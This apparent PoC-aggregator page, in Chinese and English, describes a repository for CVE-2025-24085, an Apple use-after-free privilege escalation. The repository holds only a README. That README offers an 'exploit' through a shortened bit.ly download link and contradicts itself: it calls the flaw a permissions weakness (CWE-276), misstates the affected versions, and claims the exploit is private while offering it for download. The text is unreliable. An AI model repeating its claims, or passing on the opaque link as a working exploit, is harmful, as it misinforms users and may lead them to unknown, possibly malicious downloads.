关联漏洞
标题:
N/A
(CVE-2025-24085)
描述:该漏洞涉及使用已释放的内存(use after free)问题,通过改进内存管理得到了解决。该问题已在 visionOS 2.3、iOS 18.3 和 iPadOS 18.3、macOS Sequoia 15.3、watchOS 11.3 和 tvOS 18.3 中修复。恶意应用可能能够提升权限。Apple 意识到有报告称该问题可能已在 iOS 17.2 之前的版本中被积极利用。
描述
CVE-2025-24085: Incorrect Default Permissions (CWE-276)
介绍
# CVE-2025-24085
A malicious application that can elevate privileges. This issue has been actively exploited against versions of iOS before iOS 17.2. The vulnerability can be used to gain higher-level access to the system, which leads to unauthorized control, data theft, or system compromise. This vulnerability affects Apple's VisionOS, iOS, iPadOS, macOS, watchOS, and tvOS.
## Details
+ CVE ID: CVE-2025-24085
+ Published: 2025-01-26
+ Impact: Critical
+ Exploit Availability: Not public, only private.
## Affected Versions
versions of iOS **before iOS 17.2**
## Contact
For inquiries, please contact clidanc@thesecure.biz
## Exploit
[Download](https://bit.ly/3CzTk80)
文件快照
[4.0K] /data/pocs/b164083df702236d02d5b7dded50f1aa57897783
└── [ 684] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。